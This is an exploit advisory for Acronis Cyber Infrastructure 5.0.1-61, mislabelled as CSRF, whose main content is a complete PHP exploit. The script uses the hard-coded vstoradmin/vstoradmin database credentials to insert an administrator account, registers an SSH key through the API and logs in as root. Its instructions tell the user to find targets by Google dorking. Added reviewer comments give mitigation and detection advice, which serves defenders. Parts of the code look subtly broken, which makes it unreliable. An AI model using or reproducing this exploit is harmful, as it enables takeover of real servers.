Headline
Acronis Cyber Infrastructure 5.0.1-61 Cross Site Request Forgery
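Acronis Cyber Infrastructure version 5.0.1-61 suffers from a cross site request forgery vulnerability. Note that the proof of concept below does not forge a cross-site request: it connects directly to the product's PostgreSQL service (database keystone, port 6432 in the example call) with the hard-coded credentials vstoradmin/vstoradmin, inserts a new administrator account, and then uses the management API to register an SSH key. Defenders should therefore treat it as an exposed-database and unchanged-credential problem: change that credential pair, restrict network access to the database port, apply vendor updates, and audit administrator accounts and registered SSH keys for entries nobody provisioned.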
=============================================================================================================================================
| # Title : Acronis Cyber Infrastructure 5.0.1-61 CSRF Add ADmin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.acronis.com/en-eu/products/cyber-infrastructure/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] add new admin.
[+] Line 83 + 100 +138 + 202 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php 
[+] PayLoad :
<?php
/**
 * Proof-of-concept listing as published by the advisory author.
 *
 * NOTE(review): although the advisory is titled "CSRF", nothing in this class
 * forges a browser request. Every step depends on two preconditions visible in
 * exploit(): the PostgreSQL service being reachable from the network, and the
 * hard-coded vstoradmin/vstoradmin credential pair being accepted (presumably
 * the product's shipped values; confirm against vendor documentation).
 *
 * Defensive reading of the chain:
 *  - Mitigation: change that credential pair, firewall the database port so
 *    only cluster nodes can reach it, and apply vendor updates.
 *  - Detection: remote logins to the keystone database as vstoradmin; new rows
 *    in "user", "local_user", "password" and "assignment" that no provisioning
 *    workflow created; POSTs to the ssh-keys API endpoint followed by a root
 *    SSH login from the same source.
 *
 * This review did not run or verify the listing; read it as an illustration
 * of the attack chain, not as tested code.
 */
class AcronisExploit {
    // SSH connection handle stored by doSshLogin(); null until then.
    private $sshSocket;
    // PostgreSQL connection handle set in exploit(); used by postgresQuery().
    private $dbConn;
    // Cluster id returned by getClusterId(); null until then.
    private $clusterId;

    /**
     * Start with no open connections and no known cluster id.
     */
    public function __construct() {
        // Initialize default values
        $this->sshSocket = null;
        $this->dbConn = null;
        $this->clusterId = null;
    }

    /**
     * Write a new account straight into the identity database tables.
     *
     * Rows are inserted into "user", "local_user" and "password", then an
     * "assignment" row referencing the 'admin' project and role lookups is
     * added. Because this bypasses the management API entirely, application
     * audit logs will likely not record the account creation; database-level
     * logging or a periodic diff of these tables is where it would show up.
     *
     * The plaintext password and its bcrypt hash are echoed to stdout.
     *
     * @param string $username login name stored in "local_user"
     * @param string $userid   identifier stored in "user" and referenced by the other rows
     * @param string $password plaintext password, hashed with PASSWORD_BCRYPT before storage
     * @return bool false when one of the first four queries fails; true otherwise
     *              (the two role lookups and the final assignment INSERT are not checked)
     */
    public function addAdminUser($username, $userid, $password) {
        echo "Creating admin user $username with userid $userid\n";
        // Insert new admin user into the user table
        $resQuery = $this->postgresQuery("INSERT INTO \"user\" VALUES('$userid','{}','T',NULL,NULL,NULL,'default');");
        if (!$resQuery) return false;
        // Insert new admin user into the local_user table
        // The next local_user id is derived as MAX(id) + 1 rather than from a sequence.
        $resQuery = $this->postgresQuery("SELECT MAX(id) FROM \"local_user\";");
        if (!$resQuery) return false;
        $idLuser = pg_fetch_result($resQuery, 0, 0) + 1;
        $resQuery = $this->postgresQuery("INSERT INTO \"local_user\" VALUES('$idLuser','$userid','default','$username',NULL,NULL);");
        if (!$resQuery) return false;
        // Hash the password
        $passwordHash = password_hash($password, PASSWORD_BCRYPT);
        echo "Setting password $password with hash $passwordHash\n";
        $today = date('Y-m-d');
        $resQuery = $this->postgresQuery("INSERT INTO \"password\" VALUES('$idLuser','$idLuser',NULL,'F','$passwordHash',0,NULL,DATE '$today');");
        if (!$resQuery) return false;
        // Assign admin roles
        $idProjectRole = $this->postgresQuery("SELECT id FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';");
        $idAdminRole = $this->postgresQuery("SELECT id FROM \"role\" WHERE name = 'admin';");
        echo "Assigning the admin roles: $idProjectRole and $idAdminRole\n";
        $this->postgresQuery("INSERT INTO \"assignment\" VALUES('UserProject','$userid','$idProjectRole','$idAdminRole','F');");
        echo "Successfully created admin user $username with password $password\n";
        return true;
    }

    /**
     * Run one SQL statement on the stored connection.
     *
     * @param string $query SQL text passed unchanged to pg_query()
     * @return mixed the pg_query() result, or false after printing pg_last_error()
     */
    private function postgresQuery($query) {
        $result = pg_query($this->dbConn, $query);
        if (!$result) {
            echo "PostgreSQL query failed: " . pg_last_error($this->dbConn) . "\n";
            return false;
        }
        return $result;
    }

    /**
     * Open an SSH session using public-key authentication.
     *
     * The port is fixed at 22 here; the $sshPort argument of exploit() is not
     * passed in. On success the connection is kept in $this->sshSocket.
     *
     * @param string $ip     host to connect to
     * @param string $user   account name to authenticate as
     * @param array  $sshKey paths under the keys 'public' and 'private'
     * @return bool true when authentication succeeds, false otherwise
     */
    public function doSshLogin($ip, $user, $sshKey) {
        $connection = ssh2_connect($ip, 22);
        if (!$connection) {
            echo "SSH connection failed\n";
            return false;
        }
        if (ssh2_auth_pubkey_file($connection, $user, $sshKey['public'], $sshKey['private'])) {
            $this->sshSocket = $connection;
            return true;
        } else {
            echo "SSH authentication failed\n";
            return false;
        }
    }

    /**
     * POST a JSON username/password pair to the web portal's login endpoint.
     *
     * "target-uri" in the URL is a literal placeholder in the published listing.
     * Success is judged only by the substring '"code":200' appearing in the
     * response body.
     *
     * @param string $name account name
     * @param string $pwd  account password
     * @return bool whether the response body contains '"code":200'
     */
    public function aciLogin($name, $pwd) {
        $postData = json_encode([
            'username' => $name,
            'password' => $pwd
        ]);
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/login");
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
        curl_setopt($ch, CURLOPT_HTTPHEADER, [
            'Content-Type: application/json',
            'X-Requested-With: XMLHttpRequest'
        ]);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($ch);
        curl_close($ch);
        return (strpos($response, '"code":200') !== false);
    }

    /**
     * Request the cluster list and return the id of its first entry.
     *
     * @return mixed the value at data[0].id in the decoded JSON response, or null when absent
     */
    public function getClusterId() {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/clusters");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($ch);
        curl_close($ch);
        $data = json_decode($response, true);
        if (isset($data['data'][0]['id'])) {
            return $data['data'][0]['id'];
        }
        return null;
    }

    /**
     * Reserve a temp-file path for a private key and derive the '.pub' path next to it.
     *
     * @return array the two file paths under the keys 'private' and 'public'
     */
    private function generateSshKeys() {
        $privateKey = tempnam(sys_get_temp_dir(), 'ssh_private');
        $publicKey = $privateKey . '.pub';
        ssh2_genkeypair($privateKey, $publicKey);
        return [
            'private' => $privateKey,
            'public' => $publicKey
        ];
    }

    /**
     * POST a key to the cluster's ssh-keys API endpoint.
     *
     * Defender note: this is the step that turns an administrator account into
     * host-level access, so the set of SSH keys registered on a cluster is
     * worth reviewing after any suspected compromise of an admin login.
     *
     * @param mixed $sshKey    value sent as 'key' (top level and inside event.data)
     * @param mixed $clusterId id interpolated into the request path
     * @return bool whether the response body contains '"task_id"'
     */
    public function uploadSshKey($sshKey, $clusterId) {
        $postData = json_encode([
            'key' => $sshKey,
            'event' => [
                'name' => 'SshKeys',
                'method' => 'post',
                'data' => [
                    'key' => $sshKey
                ]
            ]
        ]);
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/$clusterId/ssh-keys");
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
        curl_setopt($ch, CURLOPT_HTTPHEADER, [
            'Content-Type: application/json',
            'X-Requested-With: XMLHttpRequest'
        ]);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($ch);
        curl_close($ch);
        return (strpos($response, '"task_id"') !== false);
    }

    /**
     * Run the whole chain: database login, account insertion, portal login,
     * cluster lookup, key registration, SSH login as 'root'.
     *
     * $sshPort, $username and $password are accepted but never referenced in
     * the body; the database credentials are fixed in the connection string.
     *
     * Defender note: the account name is 8 hex characters and the user id 32
     * hex characters, both random per run, so a fixed account name is not a
     * usable indicator. Alert on the behaviour instead (admin role assignments
     * that appear without a matching provisioning event).
     *
     * @param string $rhost    host used for both the database and SSH connections
     * @param int    $dbPort   PostgreSQL port (6432 in the example call)
     * @param int    $sshPort  unused
     * @param string $username unused
     * @param string $password unused
     * @return bool true when every step reports success, false at the first failed step
     */
    public function exploit($rhost, $dbPort, $sshPort, $username, $password) {
        // Connect to PostgreSQL
        // The entire chain hinges on this login succeeding with a known credential pair.
        $this->dbConn = pg_connect("host=$rhost port=$dbPort dbname=keystone user=vstoradmin password=vstoradmin");
        if (!$this->dbConn) {
            echo "Could not connect to PostgreSQL database\n";
            return false;
        }
        // Add a new admin user
        $newUsername = substr(md5(rand()), 0, 8);
        $newPassword = substr(md5(rand()), 0, 16);
        $userId = bin2hex(random_bytes(16));
        // The return value of addAdminUser() is not checked here.
        $this->addAdminUser($newUsername, $userId, $newPassword);
        // Login to Acronis
        if (!$this->aciLogin($newUsername, $newPassword)) {
            echo "Failed to login to Acronis\n";
            return false;
        }
        // Get cluster ID
        $this->clusterId = $this->getClusterId();
        if (!$this->clusterId) {
            echo "Failed to get cluster ID\n";
            return false;
        }
        // Generate SSH keys
        $sshKey = $this->generateSshKeys();
        // Upload SSH public key
        if (!$this->uploadSshKey($sshKey['public'], $this->clusterId)) {
            echo "Failed to upload SSH public key\n";
            return false;
        }
        // SSH Login
        if (!$this->doSshLogin($rhost, 'root', $sshKey)) {
            echo "SSH login failed\n";
            return false;
        }
        echo "Exploit successful, SSH session established!\n";
        return true;
    }
}
// Example usage
// 'target-ip' is a literal placeholder in the published listing.
$exploit = new AcronisExploit();
$exploit->exploit('target-ip', 6432, 22, 'vstoradmin', 'vstoradmin');
Greetings to :
=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
|===================================================================================================